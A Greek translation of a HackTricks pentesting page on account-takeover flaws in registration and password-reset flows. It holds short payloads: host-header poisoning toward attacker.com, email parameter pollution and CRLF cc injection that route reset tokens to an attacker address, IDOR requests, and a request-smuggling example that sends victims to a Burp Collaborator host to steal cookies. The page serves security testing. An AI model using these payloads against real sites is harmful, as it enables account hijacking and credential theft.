hacktricks/pentesting-web/registration-vulnerabilities.md

16 KiB
Raw Blame History

Ευπάθειες Εγγραφής & Κατάληψης

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)!

Άλλοι τρόποι υποστήριξης των HackTricks:

WhiteIntel

WhiteIntel είναι μια μηχανή αναζήτησης που τροφοδοτείται από το dark web και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν διαρρεύσει από κλέφτες κακόβουλου λογισμικού.

Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση της κατάληψης λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.

Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:

{% embed url="https://whiteintel.io" %}


Κατάληψη Εγγραφής

Διπλή Εγγραφή

  • Δοκιμάστε να δημιουργήσετε χρησιμοποιώντας ένα υπάρχον όνομα χρήστη
  • Ελέγξτε ποικίλες μορφές του email:
    • κεφαλαία γράμματα
    • +1@
    • προσθέστε κάποιο τελεία στο email
    • ειδικοί χαρακτήρες στο όνομα του email (%00, %09, %20)
    • Βάλτε μαύρους χαρακτήρες μετά το email: test@test.com a
    • victim@gmail.com@attacker.com
    • victim@attacker.com@gmail.com

Απαρίθμηση Ονομάτων Χρηστών

Ελέγξτε αν μπορείτε να καταλάβετε πότε ένα όνομα χρήστη έχει ήδη καταχωρηθεί μέσα στην εφαρμογή.

Πολιτική Κωδικού Πρόσβασης

Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικού πρόσβασης (ελέγξτε αν μπορείτε να χρησιμοποιήσετε αδύναμους κωδικούς πρόσβασης).
Σε αυτήν την περίπτωση μπορείτε να δοκιμάσετε να κάνετε βίαιη επίθεση για διαπιστώσετε διαπιστευτήρια.

Εισβολή SQL

Ελέγξτε αυτήν τη σελίδα για να μάθετε πώς να προσπαθήσετε να καταλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω SQL Injections σε φόρμες εγγραφής.

Επιθέσεις Oauth

{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}

Ευπάθειες SAML

{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}

Αλλαγή Email

Όταν εγγραφείτε δοκιμάστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή ελέγχεται σωστά ή μπορείτε να το αλλάξετε σε τυχαία emails.

Περισσότεροι Έλεγχοι

  • Ελέγξτε αν μπορείτε να χρησιμοποιήσετε προσωρινά emails
  • Μακρύ κωδικός (>200) οδηγεί σε DoS
  • Ελέγξτε τα όρια ρυθμίσεων στη δημιουργία λογαριασμού
  • Χρησιμοποιήστε username@burp_collab.net και αναλύστε το callback

Κατάληψη Επαναφοράς Κωδικού

Διαρροή Διακριτικού Επαναφοράς Κωδικού μέσω Αναφορέα

  1. Ζητήστε επαναφορά κωδικού πρόσβασης στη διεύθυνση email σας
  2. Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού
  3. Μην αλλάξετε τον κωδικό
  4. Κάντε κλικ σε οποιονδήποτε ιστότοπο τρίτων (π.χ.: Facebook, twitter)
  5. Εμποδίστε το αίτημα στον διακομιστή Burp Suite proxy
  6. Ελέγξτε αν ο κεφαλίδα αναφορέα διαρρέει το διακριτικό επαναφοράς κωδικού.

Δηλητηρίαση Επαναφοράς Κωδικού

  1. Εμποδίστε το αίτημα επαναφοράς κωδικού στο Burp Suite
  2. Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite: Host: attacker.com, X-Forwarded-Host: attacker.com
  3. Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα
    http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
  4. Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού βασισμένη στην κεφαλίδα κεντρικού υπολογιστή όπως: https://attacker.com/reset-password.php?token=TOKEN

Επαναφορά Κωδικού μέσω Παραμέτρου Email

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR on API Parameters

  1. Ο επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στο χαρακτηριστικό Αλλαγή κωδικού πρόσβασης.
  2. Ξεκινήστε το Burp Suite και Εγκαταλείψτε το αίτημα
  3. Στείλτε το στο καρτέλα repeater και επεξεργαστείτε τις παραμέτρους: Αναγνωριστικό χρήστη/ηλεκτρονικό ταχυδρομείο
    powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Weak Password Reset Token

Το διακριτικό επαναφοράς κωδικού πρόσβασης πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά.
Προσπαθήστε να καθορίσετε εάν το διακριτικό λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι ακόλουθες μεταβλητές μπορεί να χρησιμοποιηθούν από τον αλγόριθμο.

  • Χρονική σήμανση
  • Αναγνωριστικό Χρήστη
  • Ηλεκτρονικό ταχυδρομείο του Χρήστη
  • Όνομα και Επώνυμο
  • Ημερομηνία Γέννησης
  • Κρυπτογραφία
  • Μόνο αριθμοί
  • Μικρή ακολουθία διακριτικού (χαρακτήρες μεταξύ [Α-Ζ,α-ζ,0-9])
  • Επαναχρησιμοποίηση διακριτικού
  • Ημερομηνία λήξης διακριτικού

Leaking Password Reset Token

  1. Ενεργοποιήστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για ένα συγκεκριμένο ηλεκτρονικό ταχυδρομείο, π.χ.: test@mail.com
  2. Επιθεωρήστε την απάντηση του διακομιστή και ελέγξτε το resetToken
  3. Στη συνέχεια χρησιμοποιήστε το διακριτικό σε ένα URL όπως https://example.com/v3/user/password/reset?resetToken=[ΤΟΙΑΚΡΙΤΙΚΟ_ΕΠΑΝΑΦΟΡΑΣ]&email=[ΤΟ_ΗΛΕΚΤΡΟΝΙΚΟ_ΤΑΧΥΔΡΟΜΕΙΟ]

Password Reset Via Username Collision

  1. Εγγραφείτε στο σύστημα με ένα όνομα χρήστη που είναι ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά που έχουν εισαχθεί πριν και/ή μετά από το όνομα χρήστη. π.χ.: "admin "
  2. Ζητήστε επαναφορά κωδικού με το κακόβουλο όνομα χρήστη.
  3. Χρησιμοποιήστε το διακριτικό που στάλθηκε στο ηλεκτρονικό σας ταχυδρομείο και επαναφέρετε τον κωδικό του θύματος.
  4. Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.

Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτήν την επίθεση.
Δείτε: CVE-2020-7245

Account Takeover Via Cross Site Scripting

  1. Βρείτε ένα XSS μέσα στην εφαρμογή ή ένα υποτομέα αν τα cookies είναι εστιασμένα στο γονικό domain: *.domain.com
  2. Διαρρεύστε το τρέχον cookie συνεδρίας
  3. Ταυτοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie

Account Takeover Via HTTP Request Smuggling

1. Χρησιμοποιήστε το smuggler για να ανιχνεύσετε τον τύπο του HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το POST / HTTP/1.1 με τα ακόλουθα δεδομένα:
GET http://something.burpcollaborator.net HTTP/1.1 X: με στόχο την ανοικτή ανακατεύθυνση των θυμάτων στο burpcollab και την κλοπή των cookies τους
3. Το τελικό αίτημα μπορεί να μοιάζει με το ακόλουθο

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Παραβιάσεις από το Hackerone εκμεταλλευόμενες αυτό το σφάλμα\

Κατάληψη λογαριασμού μέσω CSRF

  1. Δημιουργήστε ένα φορτίο για το CSRF, π.χ: "Φόρμα HTML με αυτόματη υποβολή για αλλαγή κωδικού πρόσβασης"
  2. Αποστείλετε το φορτίο

Κατάληψη λογαριασμού μέσω JWT

Το JSON Web Token μπορεί να χρησιμοποιηθεί για την ταυτοποίηση ενός χρήστη.

  • Επεξεργαστείτε το JWT με άλλον αριθμό αναγνωριστικού χρήστη / email
  • Ελέγξτε για αδύναμη υπογραφή JWT

{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}

Αναφορές

WhiteIntel

WhiteIntel είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το dark-web που προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν διαρρεύσει από κλέφτες κακόβουλων λογισμικών.

Ο κύριος στόχος του WhiteIntel είναι να καταπολεμήσει τις καταλήψεις λογαριασμών και τις επιθέσεις ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.

Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:

{% embed url="https://whiteintel.io" %}

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks: